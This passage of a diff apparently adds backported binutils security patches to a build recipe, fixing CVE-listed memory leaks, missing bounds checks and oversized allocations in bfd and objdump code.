1From ef186fe54aa6d281a3ff8a9528417e5cc614c797 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Sat, 13 Aug 2022 15:32:47 +0930
4Subject: [PATCH] PR29482 - strip: heap-buffer-overflow
5
6 PR 29482
7 * coffcode.h (coff_set_section_contents): Sanity check _LIB.
8
9CVE: CVE-2022-38533
10Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=ef186fe54aa6d281a3ff8a9528417e5cc614c797]
11
12Signed-off-by: Florin Diaconescu <florin.diaconescu009@gmail.com>
13
14---
15 bfd/coffcode.h | 7 +++++--
16 1 file changed, 5 insertions(+), 2 deletions(-)
17
18diff --git a/bfd/coffcode.h b/bfd/coffcode.h
19index dec2e9c6370..75c18d88602 100644
20--- a/bfd/coffcode.h
21+++ b/bfd/coffcode.h
22@@ -4170,10 +4170,13 @@ coff_set_section_contents (bfd * abfd,
23
24 rec = (bfd_byte *) location;
25 recend = rec + count;
26- while (rec < recend)
27+ while (recend - rec >= 4)
28 {
29+ size_t len = bfd_get_32 (abfd, rec);
30+ if (len == 0 || len > (size_t) (recend - rec) / 4)
31+ break;
32+ rec += len * 4;
33 ++section->lma;
34- rec += bfd_get_32 (abfd, rec) * 4;
35 }
36
37 BFD_ASSERT (rec == recend);
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
new file mode 100644
index 0000000000..ddb564bc8c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
@@ -0,0 +1,32 @@
1From 0ebc886149c22aceaf8ed74267821a59ca9d03eb Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Fri, 17 Jun 2022 09:00:41 +0930
4Subject: [PATCH] PR29254, memory leak in stab_demangle_v3_arg
5
6 PR 29254
7 * stabs.c (stab_demangle_v3_arg): Free dt on failure path.
8Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0ebc886149c22aceaf8ed74267821a59ca9d03eb]
9CVE: CVE-2022-47007
10Signed-off-by: Virendra Thakur <virendrak@kpit.com>
11Comment: Patch refreshed based on codebase.
12---
13 binutils/stabs.c | 5 ++++-
14 1 file changed, 4 insertions(+), 1 deletion(-)
15
16diff --git a/binutils/stabs.c b/binutils/stabs.c
17index 2b5241637c1..796ff85b86a 100644
18--- a/binutils/stabs.c
19+++ b/binutils/stabs.c
20@@ -5476,7 +5476,10 @@
21 dc->u.s_binary.right,
22 &varargs);
23 if (pargs == NULL)
24- return NULL;
25+ {
26+ free (dt);
27+ return NULL;
28+ }
29
30 return debug_make_function_type (dhandle, dt, pargs, varargs);
31 }
32
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
new file mode 100644
index 0000000000..9527390ccf
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47008.patch
@@ -0,0 +1,64 @@
1From d6e1d48c83b165c129cb0aa78905f7ca80a1f682 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Fri, 17 Jun 2022 09:13:38 +0930
4Subject: [PATCH] PR29255, memory leak in make_tempdir
5
6 PR 29255
7 * bucomm.c (make_tempdir, make_tempname): Free template on all
8 failure paths.
9Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=d6e1d48c83b165c129cb0aa78905f7ca80a1f682]
10CVE: CVE-2022-47008
11Signed-off-by: Virendra Thakur <virendrak@kpit.com>
12Comment: Patch refreshed based on codebase.
13---
14 binutils/bucomm.c | 20 +++++++++++---------
15 1 file changed, 11 insertions(+), 9 deletions(-)
16
17diff --git a/binutils/bucomm.c b/binutils/bucomm.c
18index fdc2209df9c..4395cb9f7f5 100644
19--- a/binutils/bucomm.c
20+++ b/binutils/bucomm.c
21@@ -542,8 +542,9 @@
22 #else
23 tmpname = mktemp (tmpname);
24 if (tmpname == NULL)
25- return NULL;
26- fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
27+ fd = -1;
28+ else
29+ fd = open (tmpname, O_RDWR | O_CREAT | O_EXCL, 0600);
30 #endif
31 if (fd == -1)
32 {
33@@ -561,22 +562,23 @@
34 make_tempdir (const char *filename)
35 {
36 char *tmpname = template_in_dir (filename);
37+ char *ret;
38
39 #ifdef HAVE_MKDTEMP
40- return mkdtemp (tmpname);
41+ ret = mkdtemp (tmpname);
42 #else
43- tmpname = mktemp (tmpname);
44- if (tmpname == NULL)
45- return NULL;
46+ ret = mktemp (tmpname);
47 #if defined (_WIN32) && !defined (__CYGWIN32__)
48 if (mkdir (tmpname) != 0)
49- return NULL;
50+ ret = NULL;
51 #else
52 if (mkdir (tmpname, 0700) != 0)
53- return NULL;
54+ ret = NULL;
55 #endif
56- return tmpname;
57 #endif
58+ if (ret == NULL)
59+ free (tmpname);
60+ return ret;
61 }
62
63 /* Parse a string into a VMA, with a fatal error if it can't be
64
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
new file mode 100644
index 0000000000..d831ed4756
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47010.patch
@@ -0,0 +1,34 @@
1From 0d02e70b197c786f26175b9a73f94e01d14abdab Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Mon, 20 Jun 2022 10:39:31 +0930
4Subject: [PATCH] PR29262, memory leak in pr_function_type
5
6 PR 29262
7 * prdbg.c (pr_function_type): Free "s" on failure path.
8Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0d02e70b197c786f26175b9a73f94e01d14abdab]
9CVE: CVE-2022-47010
10Signed-off-by: Virendra Thakur <virendrak@kpit.com>
11Comment: Patch refreshed based on codebase.
12---
13 binutils/prdbg.c | 7 ++-----
14 1 file changed, 2 insertions(+), 5 deletions(-)
15
16diff --git a/binutils/prdbg.c b/binutils/prdbg.c
17index c1e41628d26..bb42a5b6c2d 100644
18--- a/binutils/prdbg.c
19+++ b/binutils/prdbg.c
20@@ -778,12 +778,9 @@
21
22 strcat (s, ")");
23
24- if (! substitute_type (info, s))
25- return FALSE;
26-
27+ bfd_boolean ret = substitute_type (info, s);
28 free (s);
29-
30- return TRUE;
31+ return ret;
32 }
33
34 /* Turn the top type on the stack into a reference to that type. */
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
new file mode 100644
index 0000000000..250756bd38
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
@@ -0,0 +1,31 @@
1From 8a24927bc8dbf6beac2000593b21235c3796dc35 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Mon, 20 Jun 2022 10:39:13 +0930
4Subject: [PATCH] PR29261, memory leak in parse_stab_struct_fields
5
6 PR 29261
7 * stabs.c (parse_stab_struct_fields): Free "fields" on failure path.
8Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=8a24927bc8dbf6beac2000593b21235c3796dc35]
9CVE: CVE-2022-47011
10Signed-off-by: Virendra Thakur <virendrak@kpit.com>
11Comment: Patch refreshed based on codebase.
12---
13 binutils/stabs.c | 5 ++++-
14 1 file changed, 4 insertions(+), 1 deletion(-)
15
16diff --git a/binutils/stabs.c b/binutils/stabs.c
17index 796ff85b86a..bf3f578cbcc 100644
18--- a/binutils/stabs.c
19+++ b/binutils/stabs.c
20@@ -2368,7 +2368,10 @@
21
22 if (! parse_stab_one_struct_field (dhandle, info, pp, p, fields + c,
23 staticsp, p_end))
24- return FALSE;
25+ {
26+ free (fields);
27+ return FALSE;
28+ }
29
30 ++c;
31 }
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
new file mode 100644
index 0000000000..101a4cdb4e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
@@ -0,0 +1,57 @@
1From 3d3af4ba39e892b1c544d667ca241846bc3df386 Mon Sep 17 00:00:00 2001
2From: Alan Modra <amodra@gmail.com>
3Date: Sun, 4 Dec 2022 22:15:40 +1030
4Subject: [PATCH] PR29846, segmentation fault in objdump.c compare_symbols
5
6Fixes a fuzzed object file problem where plt relocs were manipulated
7in such a way that two synthetic symbols were generated at the same
8plt location. Won't occur in real object files.
9
10 PR 29846
11 PR 20337
12 * objdump.c (compare_symbols): Test symbol flags to exclude
13 section and synthetic symbols before attempting to check flavour.
14Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff;h=3d3af4ba39e892b1c544d667ca241846bc3df386]
15CVE: CVE-2022-47695
16Signed-off-by: Virendra Thakur <virendrak@kpit.com>
17Comment: Patch refreshed based on codebase.
18---
19 binutils/objdump.c | 23 ++++++++++-------------
20 1 file changed, 10 insertions(+), 13 deletions(-)
21
22diff --git a/binutils/objdump.c b/binutils/objdump.c
23index e8481b2d928..d95c8b68bf0 100644
24--- a/binutils/objdump.c
25+++ b/binutils/objdump.c
26@@ -935,20 +935,17 @@
27 return 1;
28 }
29
30- if (bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour
31+ /* Sort larger size ELF symbols before smaller. See PR20337. */
32+ bfd_vma asz = 0;
33+ if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
34+ && bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour)
35+ asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
36+ bfd_vma bsz = 0;
37+ if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
38 && bfd_get_flavour (bfd_asymbol_bfd (b)) == bfd_target_elf_flavour)
39- {
40- bfd_vma asz, bsz;
41-
42- asz = 0;
43- if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
44- asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
45- bsz = 0;
46- if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
47- bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
48- if (asz != bsz)
49- return asz > bsz ? -1 : 1;
50- }
51+ bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
52+ if (asz != bsz)
53+ return asz > bsz ? -1 : 1;
54
55 /* Symbols that start with '.' might be section names, so sort them
56 after symbols that don't start with '.'. */
57
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
new file mode 100644
index 0000000000..f41c02a02b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
@@ -0,0 +1,49 @@
1From 75393a2d54bcc40053e5262a3de9d70c5ebfbbfd Mon Sep 17 00:00:00 2001
2From: Nick Clifton <nickc@redhat.com>
3Date: Wed, 21 Dec 2022 11:51:23 +0000
4Subject: [PATCH] Fix an attempt to allocate an unreasonably large amount of
5 memory when parsing a corrupt ELF file.
6
7 PR 29924
8 * objdump.c (load_specific_debug_section): Check for excessively
9 large sections.
10Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=75393a2d54bcc40053e5262a3de9d70c5ebfbbfd]
11CVE: CVE-2022-48063
12Signed-off-by: Virendra Thakur <virendrak@kpit.com>
13Comment: Patch refreshed based on codebase.
14---
15 binutils/ChangeLog | 6 ++++++
16 binutils/objdump.c | 4 +++-
17 2 files changed, 9 insertions(+), 1 deletion(-)
18
19diff --git a/binutils/ChangeLog b/binutils/ChangeLog
20index e7f918d3f65..020e09f3700 100644
21--- a/binutils/ChangeLog
22+++ b/binutils/ChangeLog
23@@ -1,3 +1,9 @@
24+2022-12-21 Nick Clifton <nickc@redhat.com>
25+
26+ PR 29924
27+ * objdump.c (load_specific_debug_section): Check for excessively
28+ large sections.
29+
30 2021-02-11 Alan Modra <amodra@gmail.com>
31
32 PR 27290
33
34diff --git a/binutils/objdump.c b/binutils/objdump.c
35index d51abbe3858..2eb02de0e76 100644
36--- a/binutils/objdump.c
37+++ b/binutils/objdump.c
38@@ -3479,7 +3479,9 @@
39 section->size = bfd_section_size (sec);
40 /* PR 24360: On 32-bit hosts sizeof (size_t) < sizeof (bfd_size_type). */
41 alloced = amt = section->size + 1;
42- if (alloced != amt || alloced == 0)
43+ if (alloced != amt
44+ || alloced == 0
45+ || (bfd_get_size (abfd) != 0 && alloced >= bfd_get_size (abfd)))
46 {
47 section->start = NULL;
48 free_debug_section (debug);
49
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
new file mode 100644
index 0000000000..732ea43210
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
@@ -0,0 +1,530 @@
1CVE: CVE-2023-25584
2Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.34-6ubuntu1.7.debian.tar.xz upstream https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=77c225bdeb410cf60da804879ad41622f5f1aa44 ]
3Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
4
5[Ubuntu note: this is backport of the original patch, no major changes just
6 fix this patch for this release]
7From 77c225bdeb410cf60da804879ad41622f5f1aa44 Mon Sep 17 00:00:00 2001
8From: Alan Modra <amodra@gmail.com>
9Date: Mon, 12 Dec 2022 18:28:49 +1030
10Subject: [PATCH] Lack of bounds checking in vms-alpha.c parse_module
11
12 PR 29873
13 PR 29874
14 PR 29875
15 PR 29876
16 PR 29877
17 PR 29878
18 PR 29879
19 PR 29880
20 PR 29881
21 PR 29882
22 PR 29883
23 PR 29884
24 PR 29885
25 PR 29886
26 PR 29887
27 PR 29888
28 PR 29889
29 PR 29890
30 PR 29891
31 * vms-alpha.c (parse_module): Make length param bfd_size_type.
32 Delete length == -1 checks. Sanity check record_length.
33 Sanity check DST__K_MODBEG, DST__K_RTNBEG, DST__K_RTNEND lengths.
34 Sanity check DST__K_SOURCE and DST__K_LINE_NUM elements
35 before accessing.
36 (build_module_list): Pass dst_section size to parse_module.
37---
38 bfd/vms-alpha.c | 213 ++++++++++++++++++++++++++++++++++++++----------
39 1 file changed, 168 insertions(+), 45 deletions(-)
40
41--- binutils-2.34.orig/bfd/vms-alpha.c
42+++ binutils-2.34/bfd/vms-alpha.c
43@@ -4267,7 +4267,7 @@ new_module (bfd *abfd)
44
45 static void
46 parse_module (bfd *abfd, struct module *module, unsigned char *ptr,
47- int length)
48+ bfd_size_type length)
49 {
50 unsigned char *maxptr = ptr + length;
51 unsigned char *src_ptr, *pcl_ptr;
52@@ -4284,7 +4284,7 @@ parse_module (bfd *abfd, struct module *
53 curr_line = (struct lineinfo *) bfd_zalloc (abfd, sizeof (struct lineinfo));
54 module->line_table = curr_line;
55
56- while (length == -1 || ptr < maxptr)
57+ while (ptr < maxptr)
58 {
59 /* The first byte is not counted in the recorded length. */
60 int rec_length = bfd_getl16 (ptr) + 1;
61@@ -4292,15 +4292,19 @@ parse_module (bfd *abfd, struct module *
62
63 vms_debug2 ((2, "DST record: leng %d, type %d\n", rec_length, rec_type));
64
65- if (length == -1 && rec_type == DST__K_MODEND)
66+ if (rec_length > maxptr - ptr)
67+ break;
68+ if (rec_type == DST__K_MODEND)
69 break;
70
71 switch (rec_type)
72 {
73 case DST__K_MODBEG:
74+ if (rec_length <= DST_S_B_MODBEG_NAME)
75+ break;
76 module->name
77 = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_MODBEG_NAME,
78- maxptr - (ptr + DST_S_B_MODBEG_NAME));
79+ rec_length - DST_S_B_MODBEG_NAME);
80
81 curr_pc = 0;
82 prev_pc = 0;
83@@ -4314,11 +4318,13 @@ parse_module (bfd *abfd, struct module *
84 break;
85
86 case DST__K_RTNBEG:
87+ if (rec_length <= DST_S_B_RTNBEG_NAME)
88+ break;
89 funcinfo = (struct funcinfo *)
90 bfd_zalloc (abfd, sizeof (struct funcinfo));
91 funcinfo->name
92 = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_RTNBEG_NAME,
93- maxptr - (ptr + DST_S_B_RTNBEG_NAME));
94+ rec_length - DST_S_B_RTNBEG_NAME);
95 funcinfo->low = bfd_getl32 (ptr + DST_S_L_RTNBEG_ADDRESS);
96 funcinfo->next = module->func_table;
97 module->func_table = funcinfo;
98@@ -4328,6 +4334,8 @@ parse_module (bfd *abfd, struct module *
99 break;
100
101 case DST__K_RTNEND:
102+ if (rec_length < DST_S_L_RTNEND_SIZE + 4)
103+ break;
104 module->func_table->high = module->func_table->low
105 + bfd_getl32 (ptr + DST_S_L_RTNEND_SIZE) - 1;
106
107@@ -4358,13 +4366,66 @@ parse_module (bfd *abfd, struct module *
108
109 vms_debug2 ((3, "source info\n"));
110
111- while (src_ptr < ptr + rec_length)
112+ while (src_ptr - ptr < rec_length)
113 {
114 int cmd = src_ptr[0], cmd_length, data;
115
116 switch (cmd)
117 {
118 case DST__K_SRC_DECLFILE:
119+ if (src_ptr - ptr + DST_S_B_SRC_DF_LENGTH >= rec_length)
120+ cmd_length = 0x10000;
121+ else
122+ cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
123+ break;
124+
125+ case DST__K_SRC_DEFLINES_B:
126+ cmd_length = 2;
127+ break;
128+
129+ case DST__K_SRC_DEFLINES_W:
130+ cmd_length = 3;
131+ break;
132+
133+ case DST__K_SRC_INCRLNUM_B:
134+ cmd_length = 2;
135+ break;
136+
137+ case DST__K_SRC_SETFILE:
138+ cmd_length = 3;
139+ break;
140+
141+ case DST__K_SRC_SETLNUM_L:
142+ cmd_length = 5;
143+ break;
144+
145+ case DST__K_SRC_SETLNUM_W:
146+ cmd_length = 3;
147+ break;
148+
149+ case DST__K_SRC_SETREC_L:
150+ cmd_length = 5;
151+ break;
152+
153+ case DST__K_SRC_SETREC_W:
154+ cmd_length = 3;
155+ break;
156+
157+ case DST__K_SRC_FORMFEED:
158+ cmd_length = 1;
159+ break;
160+
161+ default:
162+ cmd_length = 2;
163+ break;
164+ }
165+
166+ if (src_ptr - ptr + cmd_length > rec_length)
167+ break;
168+
169+ switch (cmd)
170+ {
171+ case DST__K_SRC_DECLFILE:
172 {
173 unsigned int fileid
174 = bfd_getl16 (src_ptr + DST_S_W_SRC_DF_FILEID);
175@@ -4384,7 +4445,6 @@ parse_module (bfd *abfd, struct module *
176
177 module->file_table [fileid].name = filename;
178 module->file_table [fileid].srec = 1;
179- cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
180 vms_debug2 ((4, "DST_S_C_SRC_DECLFILE: %d, %s\n",
181 fileid, module->file_table [fileid].name));
182 }
183@@ -4401,7 +4461,6 @@ parse_module (bfd *abfd, struct module *
184 srec->sfile = curr_srec->sfile;
185 curr_srec->next = srec;
186 curr_srec = srec;
187- cmd_length = 2;
188 vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_B: %d\n", data));
189 break;
190
191@@ -4416,14 +4475,12 @@ parse_module (bfd *abfd, struct module *
192 srec->sfile = curr_srec->sfile;
193 curr_srec->next = srec;
194 curr_srec = srec;
195- cmd_length = 3;
196 vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_W: %d\n", data));
197 break;
198
199 case DST__K_SRC_INCRLNUM_B:
200 data = src_ptr[DST_S_B_SRC_UNSBYTE];
201 curr_srec->line += data;
202- cmd_length = 2;
203 vms_debug2 ((4, "DST_S_C_SRC_INCRLNUM_B: %d\n", data));
204 break;
205
206@@ -4431,21 +4488,18 @@ parse_module (bfd *abfd, struct module *
207 data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
208 curr_srec->sfile = data;
209 curr_srec->srec = module->file_table[data].srec;
210- cmd_length = 3;
211 vms_debug2 ((4, "DST_S_C_SRC_SETFILE: %d\n", data));
212 break;
213
214 case DST__K_SRC_SETLNUM_L:
215 data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
216 curr_srec->line = data;
217- cmd_length = 5;
218 vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_L: %d\n", data));
219 break;
220
221 case DST__K_SRC_SETLNUM_W:
222 data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
223 curr_srec->line = data;
224- cmd_length = 3;
225 vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_W: %d\n", data));
226 break;
227
228@@ -4453,7 +4507,6 @@ parse_module (bfd *abfd, struct module *
229 data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
230 curr_srec->srec = data;
231 module->file_table[curr_srec->sfile].srec = data;
232- cmd_length = 5;
233 vms_debug2 ((4, "DST_S_C_SRC_SETREC_L: %d\n", data));
234 break;
235
236@@ -4461,19 +4514,16 @@ parse_module (bfd *abfd, struct module *
237 data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
238 curr_srec->srec = data;
239 module->file_table[curr_srec->sfile].srec = data;
240- cmd_length = 3;
241 vms_debug2 ((4, "DST_S_C_SRC_SETREC_W: %d\n", data));
242 break;
243
244 case DST__K_SRC_FORMFEED:
245- cmd_length = 1;
246 vms_debug2 ((4, "DST_S_C_SRC_FORMFEED\n"));
247 break;
248
249 default:
250 _bfd_error_handler (_("unknown source command %d"),
251 cmd);
252- cmd_length = 2;
253 break;
254 }
255
256@@ -4486,7 +4536,7 @@ parse_module (bfd *abfd, struct module *
257
258 vms_debug2 ((3, "line info\n"));
259
260- while (pcl_ptr < ptr + rec_length)
261+ while (pcl_ptr - ptr < rec_length)
262 {
263 /* The command byte is signed so we must sign-extend it. */
264 int cmd = ((signed char *)pcl_ptr)[0], cmd_length, data;
265@@ -4494,10 +4544,106 @@ parse_module (bfd *abfd, struct module *
266 switch (cmd)
267 {
268 case DST__K_DELTA_PC_W:
269+ cmd_length = 3;
270+ break;
271+
272+ case DST__K_DELTA_PC_L:
273+ cmd_length = 5;
274+ break;
275+
276+ case DST__K_INCR_LINUM:
277+ cmd_length = 2;
278+ break;
279+
280+ case DST__K_INCR_LINUM_W:
281+ cmd_length = 3;
282+ break;
283+
284+ case DST__K_INCR_LINUM_L:
285+ cmd_length = 5;
286+ break;
287+
288+ case DST__K_SET_LINUM_INCR:
289+ cmd_length = 2;
290+ break;
291+
292+ case DST__K_SET_LINUM_INCR_W:
293+ cmd_length = 3;
294+ break;
295+
296+ case DST__K_RESET_LINUM_INCR:
297+ cmd_length = 1;
298+ break;
299+
300+ case DST__K_BEG_STMT_MODE:
301+ cmd_length = 1;
302+ break;
303+
304+ case DST__K_END_STMT_MODE:
305+ cmd_length = 1;
306+ break;
307+
308+ case DST__K_SET_LINUM_B:
309+ cmd_length = 2;
310+ break;
311+
312+ case DST__K_SET_LINUM:
313+ cmd_length = 3;
314+ break;
315+
316+ case DST__K_SET_LINUM_L:
317+ cmd_length = 5;
318+ break;
319+
320+ case DST__K_SET_PC:
321+ cmd_length = 2;
322+ break;
323+
324+ case DST__K_SET_PC_W:
325+ cmd_length = 3;
326+ break;
327+
328+ case DST__K_SET_PC_L:
329+ cmd_length = 5;
330+ break;
331+
332+ case DST__K_SET_STMTNUM:
333+ cmd_length = 2;
334+ break;
335+
336+ case DST__K_TERM:
337+ cmd_length = 2;
338+ break;
339+
340+ case DST__K_TERM_W:
341+ cmd_length = 3;
342+ break;
343+
344+ case DST__K_TERM_L:
345+ cmd_length = 5;
346+ break;
347+
348+ case DST__K_SET_ABS_PC:
349+ cmd_length = 5;
350+ break;
351+
352+ default:
353+ if (cmd <= 0)
354+ cmd_length = 1;
355+ else
356+ cmd_length = 2;
357+ break;
358+ }
359+
360+ if (pcl_ptr - ptr + cmd_length > rec_length)
361+ break;
362+
363+ switch (cmd)
364+ {
365+ case DST__K_DELTA_PC_W:
366 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
367 curr_pc += data;
368 curr_linenum += 1;
369- cmd_length = 3;
370 vms_debug2 ((4, "DST__K_DELTA_PC_W: %d\n", data));
371 break;
372
373@@ -4505,131 +4651,111 @@ parse_module (bfd *abfd, struct module *
374 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
375 curr_pc += data;
376 curr_linenum += 1;
377- cmd_length = 5;
378 vms_debug2 ((4, "DST__K_DELTA_PC_L: %d\n", data));
379 break;
380
381 case DST__K_INCR_LINUM:
382 data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
383 curr_linenum += data;
384- cmd_length = 2;
385 vms_debug2 ((4, "DST__K_INCR_LINUM: %d\n", data));
386 break;
387
388 case DST__K_INCR_LINUM_W:
389 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
390 curr_linenum += data;
391- cmd_length = 3;
392 vms_debug2 ((4, "DST__K_INCR_LINUM_W: %d\n", data));
393 break;
394
395 case DST__K_INCR_LINUM_L:
396 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
397 curr_linenum += data;
398- cmd_length = 5;
399 vms_debug2 ((4, "DST__K_INCR_LINUM_L: %d\n", data));
400 break;
401
402 case DST__K_SET_LINUM_INCR:
403 _bfd_error_handler
404 (_("%s not implemented"), "DST__K_SET_LINUM_INCR");
405- cmd_length = 2;
406 break;
407
408 case DST__K_SET_LINUM_INCR_W:
409 _bfd_error_handler
410 (_("%s not implemented"), "DST__K_SET_LINUM_INCR_W");
411- cmd_length = 3;
412 break;
413
414 case DST__K_RESET_LINUM_INCR:
415 _bfd_error_handler
416 (_("%s not implemented"), "DST__K_RESET_LINUM_INCR");
417- cmd_length = 1;
418 break;
419
420 case DST__K_BEG_STMT_MODE:
421 _bfd_error_handler
422 (_("%s not implemented"), "DST__K_BEG_STMT_MODE");
423- cmd_length = 1;
424 break;
425
426 case DST__K_END_STMT_MODE:
427 _bfd_error_handler
428 (_("%s not implemented"), "DST__K_END_STMT_MODE");
429- cmd_length = 1;
430 break;
431
432 case DST__K_SET_LINUM_B:
433 data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
434 curr_linenum = data;
435- cmd_length = 2;
436 vms_debug2 ((4, "DST__K_SET_LINUM_B: %d\n", data));
437 break;
438
439 case DST__K_SET_LINUM:
440 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
441 curr_linenum = data;
442- cmd_length = 3;
443 vms_debug2 ((4, "DST__K_SET_LINE_NUM: %d\n", data));
444 break;
445
446 case DST__K_SET_LINUM_L:
447 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
448 curr_linenum = data;
449- cmd_length = 5;
450 vms_debug2 ((4, "DST__K_SET_LINUM_L: %d\n", data));
451 break;
452
453 case DST__K_SET_PC:
454 _bfd_error_handler
455 (_("%s not implemented"), "DST__K_SET_PC");
456- cmd_length = 2;
457 break;
458
459 case DST__K_SET_PC_W:
460 _bfd_error_handler
461 (_("%s not implemented"), "DST__K_SET_PC_W");
462- cmd_length = 3;
463 break;
464
465 case DST__K_SET_PC_L:
466 _bfd_error_handler
467 (_("%s not implemented"), "DST__K_SET_PC_L");
468- cmd_length = 5;
469 break;
470
471 case DST__K_SET_STMTNUM:
472 _bfd_error_handler
473 (_("%s not implemented"), "DST__K_SET_STMTNUM");
474- cmd_length = 2;
475 break;
476
477 case DST__K_TERM:
478 data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
479 curr_pc += data;
480- cmd_length = 2;
481 vms_debug2 ((4, "DST__K_TERM: %d\n", data));
482 break;
483
484 case DST__K_TERM_W:
485 data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
486 curr_pc += data;
487- cmd_length = 3;
488 vms_debug2 ((4, "DST__K_TERM_W: %d\n", data));
489 break;
490
491 case DST__K_TERM_L:
492 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
493 curr_pc += data;
494- cmd_length = 5;
495 vms_debug2 ((4, "DST__K_TERM_L: %d\n", data));
496 break;
497
498 case DST__K_SET_ABS_PC:
499 data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
500 curr_pc = data;
501- cmd_length = 5;
502 vms_debug2 ((4, "DST__K_SET_ABS_PC: 0x%x\n", data));
503 break;
504
505@@ -4638,15 +4764,11 @@ parse_module (bfd *abfd, struct module *
506 {
507 curr_pc -= cmd;
508 curr_linenum += 1;
509- cmd_length = 1;
510 vms_debug2 ((4, "bump pc to 0x%lx and line to %d\n",
511 (unsigned long)curr_pc, curr_linenum));
512 }
513 else
514- {
515- _bfd_error_handler (_("unknown line command %d"), cmd);
516- cmd_length = 2;
517- }
518+ _bfd_error_handler (_("unknown line command %d"), cmd);
519 break;
520 }
521
522@@ -4778,7 +4900,7 @@ build_module_list (bfd *abfd)
523 return NULL;
524
525 module = new_module (abfd);
526- parse_module (abfd, module, PRIV (dst_section)->contents, -1);
527+ parse_module (abfd, module, PRIV (dst_section)->contents, PRIV (dst_section)->size);
528 list = module;
529 }
530
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
new file mode 100644
index 0000000000..aa5ce5f3ff
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
@@ -0,0 +1,149 @@
